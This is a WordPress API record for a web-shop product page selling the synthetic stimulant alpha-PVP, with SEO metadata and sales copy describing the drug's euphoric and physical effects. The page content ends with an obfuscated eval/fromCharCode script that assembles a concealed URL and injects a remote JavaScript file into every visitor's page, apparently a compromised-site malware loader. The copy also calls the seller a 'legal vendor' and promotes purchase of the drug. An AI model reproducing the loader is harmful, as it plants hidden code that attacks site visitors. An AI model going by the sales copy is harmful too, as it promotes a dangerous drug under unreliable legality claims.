{"id":4199,"date":"2025-02-06T21:30:46","date_gmt":"2025-02-06T21:30:46","guid":{"rendered":"https:\/\/exoticchemicals.com\/?post_type=product&#038;p=4199"},"modified":"2026-04-12T15:21:36","modified_gmt":"2026-04-12T15:21:36","slug":"buy-alpha-pyrrolidinovalerophenone-a-pvp","status":"publish","type":"product","link":"https:\/\/exoticchemicals.com\/tr\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/","title":{"rendered":"Buy alpha-Pyrrolidinovalerophenone (A-PVP)"},"content":{"rendered":"<h1 style=\"text-align: center\"><b>Buy alpha-Pyrrolidinovalerophenone (<\/b>A-PVP) Crystals<\/h1>\n<p>Buy A-Pvp Crystal Online has a short history of use and is subject to much scrutiny by the media, similar to how MDPV a were portrayed in early 2011 a-PVP Crystal\u00a0 is a synthetic stimulant drug of the cathinone and\u00a0<a href=\"https:\/\/en.wikipedia.org\/wiki\/N-Ethylpentylone\" target=\"_blank\" rel=\"noopener noreferrer\">pyrovalerone\u00a0<\/a>classes.<\/p>\n<p>It is chemically similar to other\u00a0 compounds such as MDPV and cathinone compounds found in a plant of eastern Africa.It generally comes in the form of either a crystalline powder or large crystal shards which users can ingest to produce effects which are somewhat similar to that of amphetamine and cocaine.<\/p>\n<h2><a href=\"https:\/\/primarycaremedstore.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/\">Buy\u00a0<b>alpha-Pyrrolidinovalerophenone\u00a0<\/b>Online<\/a><\/h2>\n<p>Dry mouth and dehydration are a universal experience with \u03b1-PVP and are a product of an increased heart rate and extreme motivation to engage in strenuous physical activities, thile it is important to avoid becoming dehydrated, especially when out dancing in a hot environment, there is a potential possibility of suffering from water intoxication through over-drinking so it is advised that users simply sip at water and never over drink.<\/p>\n<h3><a href=\"https:\/\/primarycaremedstore.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/\">alpha-PVP Crystals Physical effects<\/a><\/h3>\n<p>Spontaneous tactile sensations \u03b1-PVP can be described as a moderate to extreme euphoric tingling sensation that encompasses the entire body, It is capable of becoming overwhelming at higher dosages, this sensation maintains a consistent presence that steadily rises with the onset and hits its limit once the peak has been reached, timulation\u00a0 In terms of its effects on the user\u2019s physical energy levels, \u03b1-PVP can be considered to be extremely stimulating and energetic, this encourages activities such as running, climbing and dancing, the particular style of stimulation which \u03b1-PVP presents can be described as forced.<\/p>\n<p>This means that at higher dosages it becomes difficult or impossible to keep still as jaw clenching, involuntarily bodily shakes and vibrations become present, resulting in an extreme unsteadiness of the hands and a general lack of motor control.<\/p>\n<p>A person\u2019s eyeballs may begin to spontaneously wiggle back and forth in a rapid motion, causing vision to become blurry and temporarily out of focus a condition known as nystagmus.<\/p>\n<h3>We are a legal vendor of <a href=\"https:\/\/primarycaremedstore.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/\"><b>alpha-Pyrrolidinovalerophenone (<\/b>A-PVP) Crystals<\/a>, We sell and supply well preserved a-pvp powder, solid drug and\u00a0 other research chemicals all over Europe and USA.<\/h3>\n<p>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>Buy alpha-Pyrrolidinovalerophenone (A-PVP) Crystals Buy A-Pvp Crystal Online has a short history of use and is subject to much scrutiny by the media, similar to how MDPV a were portrayed in early 2011 a-PVP Crystal\u00a0 is a synthetic stimulant drug of the cathinone and\u00a0pyrovalerone\u00a0classes. It is chemically similar to other\u00a0 compounds such as MDPV and [&hellip;]<\/p>\n","protected":false},"featured_media":4224,"comment_status":"open","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[5540],"product_tag":[9801,9802,9803,9804,9805,9806,9807,9808,9809,9810,9811,9812,9813,9814,9815,9816,9817,9818,9819,9820,9821,9822,9823,9824,9825,9826,9827,9828,9829,9830,9831,9832,9833,9834,9835,9836,9837,9838,9839,9840,9841,9842,9843,9844,9845,9846,9847,9848,9849,9850,9851,9852,9853,9854,9855,9856,9857,9858,9859,9860,9861,9862,9863,9864,9865,9866,9867,9868,9869,9870,9871,9872,9873,9874,9875,9876,9877],"class_list":{"0":"post-4199","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-mdphp-hydrochloride-price-per-gram-research-chemical","7":"product_tag-a-pvp-crystals-for-sale","8":"product_tag-a-pvp-for-sale","9":"product_tag-a-pvp-legality","10":"product_tag-a-pvp-online-price","11":"product_tag-a-pvp-online-shop","12":"product_tag-a-pvp-online-store","13":"product_tag-a-pvp-online-vendor","14":"product_tag-a-pvp-price","15":"product_tag-a-pvp-purchase","16":"product_tag-a-pvp-recreational-use","17":"product_tag-a-pvp-safety","18":"product_tag-alpha-pvp-addiction","19":"product_tag-alpha-pvp-buy","20":"product_tag-alpha-pvp-dosage","21":"product_tag-alpha-pvp-effects","22":"product_tag-alpha-pvp-legality","23":"product_tag-alpha-pvp-legality-in-usa","24":"product_tag-alpha-pvp-online","25":"product_tag-alpha-pvp-online-purchase","26":"product_tag-alpha-pvp-online-shop","27":"product_tag-alpha-pvp-purchase","28":"product_tag-alpha-pvp-safety-tips","29":"product_tag-alpha-pvp-vendor","30":"product_tag-alpha-pvp-vendor-online","31":"product_tag-alpha-pvp-vs-other-stimulants","32":"product_tag-alpha-pvp-withdrawal","33":"product_tag-alpha-pyrrolidinovalerophenone-for-research","34":"product_tag-alpha-pyrrolidinovalerophenone-for-sale","35":"product_tag-alpha-pyrrolidinovalerophenone-legality","36":"product_tag-alpha-pyrrolidinovalerophenone-legality-in-usa","37":"product_tag-alpha-pyrrolidinovalerophenone-online","38":"product_tag-alpha-pyrrolidinovalerophenone-price","39":"product_tag-apvp-crystal-addiction","40":"product_tag-apvp-crystal-addiction-treatment","41":"product_tag-apvp-crystal-buy","42":"product_tag-apvp-crystal-dosage","43":"product_tag-apvp-crystal-effects","44":"product_tag-apvp-crystal-effects-on-health","45":"product_tag-apvp-crystal-effects-on-mind","46":"product_tag-apvp-crystal-for-research","47":"product_tag-apvp-crystal-for-sale","48":"product_tag-apvp-crystal-legal-status","49":"product_tag-apvp-crystal-legal-status-in-usa","50":"product_tag-apvp-crystal-legality","51":"product_tag-apvp-crystal-legality-in-usa","52":"product_tag-apvp-crystal-online-price","53":"product_tag-apvp-crystal-online-purchase","54":"product_tag-apvp-crystal-online-shop","55":"product_tag-apvp-crystal-online-store","56":"product_tag-apvp-crystal-online-vendor","57":"product_tag-apvp-crystal-price","58":"product_tag-apvp-crystal-purchase","59":"product_tag-apvp-crystal-recreational-effects","60":"product_tag-apvp-crystal-recreational-use","61":"product_tag-apvp-crystal-safety","62":"product_tag-apvp-crystal-safety-tips","63":"product_tag-apvp-crystal-side-effects","64":"product_tag-apvp-crystal-usage","65":"product_tag-apvp-crystal-vendor","66":"product_tag-apvp-crystal-vendor-online","67":"product_tag-apvp-crystal-vs-competitor","68":"product_tag-apvp-crystal-vs-other-stimulants","69":"product_tag-apvp-crystal-withdrawal","70":"product_tag-buy-a-pvp-crystals","71":"product_tag-buy-a-pvp-crystals-online","72":"product_tag-buy-a-pvp-online","73":"product_tag-buy-alpha-pvp-crystals-online","74":"product_tag-buy-alpha-pvp-online","75":"product_tag-buy-alpha-pyrrolidinovalerophenone-online","76":"product_tag-buy-apvp-crystal-online","77":"product_tag-purchase-a-pyrrolidinovalerophenone-online","78":"product_tag-purchase-alpha-pyrrolidinovalerophenone","79":"product_tag-purchase-apvp-crystal","80":"product_tag-purchase-apvp-crystal-online","81":"product_tag-where-to-buy-a-pvp-online","82":"product_tag-where-to-buy-alpha-pvp","83":"product_tag-where-to-buy-apvp-crystal","84":"desktop-align-left","85":"tablet-align-left","86":"mobile-align-left","88":"first","89":"instock","90":"shipping-taxable","91":"purchasable","92":"product-type-variable"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buy alpha-Pyrrolidinovalerophenone (A-PVP) -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/exoticchemicals.com\/tr\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buy alpha-Pyrrolidinovalerophenone (A-PVP) -\" \/>\n<meta property=\"og:description\" content=\"Buy alpha-Pyrrolidinovalerophenone (A-PVP) Crystals Buy A-Pvp Crystal Online has a short history of use and is subject to much scrutiny by the media, similar to how MDPV a were portrayed in early 2011 a-PVP Crystal\u00a0 is a synthetic stimulant drug of the cathinone and\u00a0pyrovalerone\u00a0classes. It is chemically similar to other\u00a0 compounds such as MDPV and [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/exoticchemicals.com\/tr\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-12T15:21:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"678\" \/>\n\t<meta property=\"og:image:height\" content=\"508\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 dakika\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-alpha-pyrrolidinovalerophenone-a-pvp\\\/\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-alpha-pyrrolidinovalerophenone-a-pvp\\\/\",\"name\":\"Buy alpha-Pyrrolidinovalerophenone (A-PVP) -\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-alpha-pyrrolidinovalerophenone-a-pvp\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-alpha-pyrrolidinovalerophenone-a-pvp\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/Buy-A-Pvp-Crystal-Online.jpg\",\"datePublished\":\"2025-02-06T21:30:46+00:00\",\"dateModified\":\"2026-04-12T15:21:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-alpha-pyrrolidinovalerophenone-a-pvp\\\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-alpha-pyrrolidinovalerophenone-a-pvp\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-alpha-pyrrolidinovalerophenone-a-pvp\\\/#primaryimage\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/Buy-A-Pvp-Crystal-Online.jpg\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/Buy-A-Pvp-Crystal-Online.jpg\",\"width\":678,\"height\":508},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/product\\\/buy-alpha-pyrrolidinovalerophenone-a-pvp\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\\\/\\\/exoticchemicals.com\\\/shop\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Buy alpha-Pyrrolidinovalerophenone (A-PVP)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#website\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/\",\"name\":\"exotic chemicals\",\"description\":\"Buy MDPHP Hydrochloride\",\"publisher\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/exoticchemicals.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/#\\\/schema\\\/person\\\/07ad08472b6f5b213792451a32dbe8c7\",\"name\":\"wwalkershop@gmail.com\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"url\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"contentUrl\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\",\"width\":500,\"height\":500,\"caption\":\"wwalkershop@gmail.com\"},\"logo\":{\"@id\":\"https:\\\/\\\/exoticchemicals.com\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/pure-3-1-1.png\"},\"sameAs\":[\"http:\\\/\\\/exoticchemicals.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Buy alpha-Pyrrolidinovalerophenone (A-PVP) -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/exoticchemicals.com\/tr\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/","og_locale":"tr_TR","og_type":"article","og_title":"Buy alpha-Pyrrolidinovalerophenone (A-PVP) -","og_description":"Buy alpha-Pyrrolidinovalerophenone (A-PVP) Crystals Buy A-Pvp Crystal Online has a short history of use and is subject to much scrutiny by the media, similar to how MDPV a were portrayed in early 2011 a-PVP Crystal\u00a0 is a synthetic stimulant drug of the cathinone and\u00a0pyrovalerone\u00a0classes. It is chemically similar to other\u00a0 compounds such as MDPV and [&hellip;]","og_url":"https:\/\/exoticchemicals.com\/tr\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/","article_modified_time":"2026-04-12T15:21:36+00:00","og_image":[{"width":678,"height":508,"url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Tahmini okuma s\u00fcresi":"2 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/exoticchemicals.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/","url":"https:\/\/exoticchemicals.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/","name":"Buy alpha-Pyrrolidinovalerophenone (A-PVP) -","isPartOf":{"@id":"https:\/\/exoticchemicals.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/#primaryimage"},"image":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/#primaryimage"},"thumbnailUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg","datePublished":"2025-02-06T21:30:46+00:00","dateModified":"2026-04-12T15:21:36+00:00","breadcrumb":{"@id":"https:\/\/exoticchemicals.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/exoticchemicals.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/"]}]},{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/#primaryimage","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg","width":678,"height":508},{"@type":"BreadcrumbList","@id":"https:\/\/exoticchemicals.com\/product\/buy-alpha-pyrrolidinovalerophenone-a-pvp\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/exoticchemicals.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/exoticchemicals.com\/shop\/"},{"@type":"ListItem","position":3,"name":"Buy alpha-Pyrrolidinovalerophenone (A-PVP)"}]},{"@type":"WebSite","@id":"https:\/\/exoticchemicals.com\/#website","url":"https:\/\/exoticchemicals.com\/","name":"egzoti\u0307k ki\u0307myasallar","description":"MDPHP Hidroklor\u00fcr Sat\u0131n Al\u0131n","publisher":{"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/exoticchemicals.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"},{"@type":["Person","Organization"],"@id":"https:\/\/exoticchemicals.com\/#\/schema\/person\/07ad08472b6f5b213792451a32dbe8c7","name":"wwalkershop@gmail.com","image":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","url":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","contentUrl":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png","width":500,"height":500,"caption":"wwalkershop@gmail.com"},"logo":{"@id":"https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/pure-3-1-1.png"},"sameAs":["http:\/\/exoticchemicals.com"]}]}},"uagb_featured_image_src":{"full":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg",678,508,false],"thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online-150x150.jpg",150,150,true],"medium":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online-300x225.jpg",300,225,true],"medium_large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg",678,508,false],"large":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg",678,508,false],"1536x1536":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg",678,508,false],"2048x2048":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg",678,508,false],"trp-custom-language-flag":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online.jpg",16,12,false],"woocommerce_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online-300x300.jpg",300,300,true],"woocommerce_single":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online-600x450.jpg",600,450,true],"woocommerce_gallery_thumbnail":["https:\/\/exoticchemicals.com\/wp-content\/uploads\/2025\/02\/Buy-A-Pvp-Crystal-Online-100x100.jpg",100,100,true]},"uagb_author_info":{"display_name":"bossman","author_link":"https:\/\/exoticchemicals.com\/tr\/author\/"},"uagb_comment_info":7,"uagb_excerpt":"Buy alpha-Pyrrolidinovalerophenone (A-PVP) Crystals Buy A-Pvp Crystal Online has a short history of use and is subject to much scrutiny by the media, similar to how MDPV a were portrayed in early 2011 a-PVP Crystal\u00a0 is a synthetic stimulant drug of the cathinone and\u00a0pyrovalerone\u00a0classes. It is chemically similar to other\u00a0 compounds such as MDPV and&hellip;","_links":{"self":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product\/4199","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/comments?post=4199"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media\/4224"}],"wp:attachment":[{"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/media?parent=4199"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_brand?post=4199"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_cat?post=4199"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/exoticchemicals.com\/tr\/wp-json\/wp\/v2\/product_tag?post=4199"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}